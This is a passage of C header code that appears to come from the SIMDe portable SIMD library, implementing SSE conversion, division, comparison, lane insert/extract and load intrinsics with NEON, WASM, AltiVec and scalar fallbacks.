#elif defined(SIMDE_WASM_SIMD128_NATIVE)
const v128_t sign_pos = wasm_f32x4_splat(-0.0f);
r_.wasm_v128 =
wasm_v128_bitselect(src_.wasm_v128, dest_.wasm_v128, sign_pos);
#elif defined(SIMDE_POWER_ALTIVEC_P9_NATIVE)
#if !defined(HEDLEY_IBM_VERSION)
r_.altivec_f32 = vec_cpsgn(dest_.altivec_f32, src_.altivec_f32);
#else
r_.altivec_f32 = vec_cpsgn(src_.altivec_f32, dest_.altivec_f32);
#endif
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
const SIMDE_POWER_ALTIVEC_VECTOR(unsigned int)
sign_pos = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(unsigned int),
vec_splats(-0.0f));
r_.altivec_f32 = vec_sel(dest_.altivec_f32, src_.altivec_f32, sign_pos);
#elif defined(SIMDE_IEEE754_STORAGE)
(void)src_;
(void)dest_;
simde__m128 sign_pos = simde_mm_set1_ps(-0.0f);
r_ = simde__m128_to_private(simde_mm_xor_ps(
dest, simde_mm_and_ps(simde_mm_xor_ps(dest, src), sign_pos)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = simde_math_copysignf(dest_.f32[i], src_.f32[i]);
}
#endif
return simde__m128_from_private(r_);
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_xorsign_ps(simde__m128 dest, simde__m128 src)
{
return simde_mm_xor_ps(simde_mm_and_ps(simde_mm_set1_ps(-0.0f), src),
dest);
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvt_pi2ps(simde__m128 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvt_pi2ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
simde__m64_private b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(vcvt_f32_s32(b_.neon_i32),
vget_high_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, b_.i32);
r_.m64_private[1] = a_.m64_private[1];
#else
r_.f32[0] = (simde_float32)b_.i32[0];
r_.f32[1] = (simde_float32)b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_pi2ps(a, b) simde_mm_cvt_pi2ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvt_ps2pi(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvt_ps2pi(a);
#else
simde__m64_private r_;
simde__m128_private a_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_) && SIMDE_NATURAL_VECTOR_SIZE_GE(128)
a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
SIMDE_CONVERT_VECTOR_(r_.i32, a_.m64_private[0].f32);
#else
a_ = simde__m128_to_private(a);
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = HEDLEY_STATIC_CAST(
int32_t, simde_math_nearbyintf(a_.f32[i]));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_ps2pi(a) simde_mm_cvt_ps2pi((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvt_si2ss(simde__m128 a, int32_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvt_si2ss(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(HEDLEY_STATIC_CAST(float, b), a_.neon_f32, 0);
#else
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
r_.i32[1] = a_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_si2ss(a, b) simde_mm_cvt_si2ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvt_ss2si(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvt_ss2si(a);
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
return vgetq_lane_s32(vcvtnq_s32_f32(simde__m128_to_neon_f32(a)), 0);
#else
simde__m128_private a_ = simde__m128_to_private(
simde_mm_round_ps(a, SIMDE_MM_FROUND_CUR_DIRECTION));
return SIMDE_CONVERT_FTOI(int32_t, a_.f32[0]);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvt_ss2si(a) simde_mm_cvt_ss2si((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi16_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi16_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_s32(vmovl_s16(a_.neon_i16));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.f32, a_.i16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
simde_float32 v = a_.i16[i];
r_.f32[i] = v;
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi16_ps(a) simde_mm_cvtpi16_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi32_ps(simde__m128 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi32_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
simde__m64_private b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(vcvt_f32_s32(b_.neon_i32),
vget_high_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, b_.i32);
r_.m64_private[1] = a_.m64_private[1];
#else
r_.f32[0] = (simde_float32)b_.i32[0];
r_.f32[1] = (simde_float32)b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi32_ps(a, b) simde_mm_cvtpi32_ps((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi32x2_ps(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi32x2_ps(a, b);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_s32(vcombine_s32(a_.neon_i32, b_.neon_i32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, a_.i32);
SIMDE_CONVERT_VECTOR_(r_.m64_private[1].f32, b_.i32);
#else
r_.f32[0] = (simde_float32)a_.i32[0];
r_.f32[1] = (simde_float32)a_.i32[1];
r_.f32[2] = (simde_float32)b_.i32[0];
r_.f32[3] = (simde_float32)b_.i32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi32x2_ps(a, b) simde_mm_cvtpi32x2_ps(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi8_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi8_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vcvtq_f32_s32(vmovl_s16(vget_low_s16(vmovl_s8(a_.neon_i8))));
#else
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[0]);
r_.f32[1] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[1]);
r_.f32[2] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[2]);
r_.f32[3] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[3]);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi8_ps(a) simde_mm_cvtpi8_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi16(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi16(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_i16 = vmovn_s32(vcvtq_s32_f32(vrndiq_f32(a_.neon_f32)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = SIMDE_CONVERT_FTOI(int16_t,
simde_math_roundf(a_.f32[i]));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi16(a) simde_mm_cvtps_pi16((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi32(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi32(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && \
defined(SIMDE_FAST_CONVERSION_RANGE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(vrndiq_f32(a_.neon_f32)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
simde_float32 v = simde_math_roundf(a_.f32[i]);
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
r_.i32[i] =
((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
r_.i32[i] = SIMDE_CONVERT_FTOI(int32_t, v);
#endif
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi32(a) simde_mm_cvtps_pi32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi8(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi8(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95471)
/* Clamp the input to [INT8_MIN, INT8_MAX], round, convert to i32, narrow to
* i16, combine with an all-zero vector of i16 (which will become the upper
* half), narrow to i8. */
float32x4_t max =
vdupq_n_f32(HEDLEY_STATIC_CAST(simde_float32, INT8_MAX));
float32x4_t min =
vdupq_n_f32(HEDLEY_STATIC_CAST(simde_float32, INT8_MIN));
float32x4_t values =
vrndnq_f32(vmaxq_f32(vminq_f32(max, a_.neon_f32), min));
r_.neon_i8 = vmovn_s16(
vcombine_s16(vmovn_s32(vcvtq_s32_f32(values)), vdup_n_s16(0)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(a_.f32) / sizeof(a_.f32[0])); i++) {
if (a_.f32[i] > HEDLEY_STATIC_CAST(simde_float32, INT8_MAX))
r_.i8[i] = INT8_MAX;
else if (a_.f32[i] <
HEDLEY_STATIC_CAST(simde_float32, INT8_MIN))
r_.i8[i] = INT8_MIN;
else
r_.i8[i] = SIMDE_CONVERT_FTOI(
int8_t, simde_math_roundf(a_.f32[i]));
}
/* Note: the upper half is undefined */
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi8(a) simde_mm_cvtps_pi8((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpu16_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpu16_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_u32(vmovl_u16(a_.neon_u16));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.f32, a_.u16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (simde_float32)a_.u16[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpu16_ps(a) simde_mm_cvtpu16_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpu8_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpu8_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vcvtq_f32_u32(vmovl_u16(vget_low_u16(vmovl_u8(a_.neon_u8))));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = HEDLEY_STATIC_CAST(simde_float32, a_.u8[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpu8_ps(a) simde_mm_cvtpu8_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtsi32_ss(simde__m128 a, int32_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtsi32_ss(a, b);
#else
simde__m128_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(HEDLEY_STATIC_CAST(float32_t, b),
a_.neon_f32, 0);
#else
r_ = a_;
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtsi32_ss(a, b) simde_mm_cvtsi32_ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtsi64_ss(simde__m128 a, int64_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64)
#if !defined(__PGI)
return _mm_cvtsi64_ss(a, b);
#else
return _mm_cvtsi64x_ss(a, b);
#endif
#else
simde__m128_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(HEDLEY_STATIC_CAST(float32_t, b),
a_.neon_f32, 0);
#else
r_ = a_;
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtsi64_ss(a, b) simde_mm_cvtsi64_ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde_float32 simde_mm_cvtss_f32(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtss_f32(a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vgetq_lane_f32(a_.neon_f32, 0);
#else
return a_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_f32(a) simde_mm_cvtss_f32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvtss_si32(simde__m128 a)
{
return simde_mm_cvt_ss2si(a);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_si32(a) simde_mm_cvtss_si32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int64_t simde_mm_cvtss_si64(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64)
#if !defined(__PGI)
return _mm_cvtss_si64(a);
#else
return _mm_cvtss_si64x(a);
#endif
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return SIMDE_CONVERT_FTOI(
int64_t, simde_math_roundf(vgetq_lane_f32(a_.neon_f32, 0)));
#else
return SIMDE_CONVERT_FTOI(int64_t, simde_math_roundf(a_.f32[0]));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_si64(a) simde_mm_cvtss_si64((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtt_ps2pi(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtt_ps2pi(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_CONVERSION_RANGE)
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(a_.neon_f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
simde_float32 v = a_.f32[i];
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
r_.i32[i] =
((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
r_.i32[i] = SIMDE_CONVERT_FTOI(int32_t, v);
#endif
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_mm_cvttps_pi32(a) simde_mm_cvtt_ps2pi(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtt_ps2pi(a) simde_mm_cvtt_ps2pi((a))
#define _mm_cvttps_pi32(a) simde_mm_cvttps_pi32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvtt_ss2si(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtt_ss2si(a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_CONVERSION_RANGE)
return SIMDE_CONVERT_FTOI(int32_t, vgetq_lane_f32(a_.neon_f32, 0));
#else
simde_float32 v = a_.f32[0];
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
return ((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
return SIMDE_CONVERT_FTOI(int32_t, v);
#endif
#endif
#endif
}
#define simde_mm_cvttss_si32(a) simde_mm_cvtt_ss2si((a))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtt_ss2si(a) simde_mm_cvtt_ss2si((a))
#define _mm_cvttss_si32(a) simde_mm_cvtt_ss2si((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int64_t simde_mm_cvttss_si64(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64) && \
!defined(_MSC_VER)
#if defined(__PGI)
return _mm_cvttss_si64x(a);
#else
return _mm_cvttss_si64(a);
#endif
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return SIMDE_CONVERT_FTOI(int64_t, vgetq_lane_f32(a_.neon_f32, 0));
#else
return SIMDE_CONVERT_FTOI(int64_t, a_.f32[0]);
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvttss_si64(a) simde_mm_cvttss_si64((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpord_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpord_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpord_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(simde_math_isnanf)
r_.u32[0] = (simde_math_isnanf(simde_mm_cvtss_f32(a)) ||
simde_math_isnanf(simde_mm_cvtss_f32(b)))
? UINT32_C(0)
: ~UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpord_ss(a, b) simde_mm_cmpord_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_div_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_div_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vdivq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t recip0 = vrecpeq_f32(b_.neon_f32);
float32x4_t recip1 =
vmulq_f32(recip0, vrecpsq_f32(recip0, b_.neon_f32));
r_.neon_f32 = vmulq_f32(a_.neon_f32, recip1);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_div(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_div(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 / b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] / b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_div_ps(a, b) simde_mm_div_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_div_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_div_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_div_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value = vgetq_lane_f32(
simde__m128_to_private(simde_mm_div_ps(a, b)).neon_f32, 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = a_.f32[0] / b_.f32[0];
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_div_ss(a, b) simde_mm_div_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int16_t simde_mm_extract_pi16(simde__m64 a, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 3)
{
simde__m64_private a_ = simde__m64_to_private(a);
return a_.i16[imm8];
}
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(HEDLEY_PGI_VERSION)
#if defined(SIMDE_BUG_CLANG_44589)
#define simde_mm_extract_pi16(a, imm8) \
(HEDLEY_DIAGNOSTIC_PUSH _Pragma( \
"clang diagnostic ignored \"-Wvector-conversion\"") \
HEDLEY_STATIC_CAST(int16_t, _mm_extract_pi16((a), (imm8))) \
HEDLEY_DIAGNOSTIC_POP)
#else
#define simde_mm_extract_pi16(a, imm8) \
HEDLEY_STATIC_CAST(int16_t, _mm_extract_pi16(a, imm8))
#endif
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_extract_pi16(a, imm8) \
vget_lane_s16(simde__m64_to_private(a).neon_i16, imm8)
#endif
#define simde_m_pextrw(a, imm8) simde_mm_extract_pi16(a, imm8)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_extract_pi16(a, imm8) simde_mm_extract_pi16((a), (imm8))
#define _m_pextrw(a, imm8) simde_mm_extract_pi16((a), (imm8))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_insert_pi16(simde__m64 a, int16_t i, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 3)
{
simde__m64_private r_, a_ = simde__m64_to_private(a);
r_.i64[0] = a_.i64[0];
r_.i16[imm8] = i;
return simde__m64_from_private(r_);
}
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#if defined(SIMDE_BUG_CLANG_44589)
#define ssimde_mm_insert_pi16(a, i, imm8) \
(HEDLEY_DIAGNOSTIC_PUSH _Pragma( \
"clang diagnostic ignored \"-Wvector-conversion\"")( \
_mm_insert_pi16((a), (i), (imm8))) HEDLEY_DIAGNOSTIC_POP)
#else
#define simde_mm_insert_pi16(a, i, imm8) _mm_insert_pi16(a, i, imm8)
#endif
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_insert_pi16(a, i, imm8) \
simde__m64_from_neon_i16( \
vset_lane_s16((i), simde__m64_to_neon_i16(a), (imm8)))
#endif
#define simde_m_pinsrw(a, i, imm8) (simde_mm_insert_pi16(a, i, imm8))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_insert_pi16(a, i, imm8) simde_mm_insert_pi16(a, i, imm8)
#define _m_pinsrw(a, i, imm8) simde_mm_insert_pi16(a, i, imm8)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_load_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ps(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vld1q_f32(mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_vsx_ld(0, mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_ld(0, mem_addr);
#else
simde_memcpy(&r_, SIMDE_ALIGN_ASSUME_LIKE(mem_addr, simde__m128),
sizeof(r_));
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ps(mem_addr) simde_mm_load_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_load1_ps(simde_float32 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ps1(mem_addr);
#else
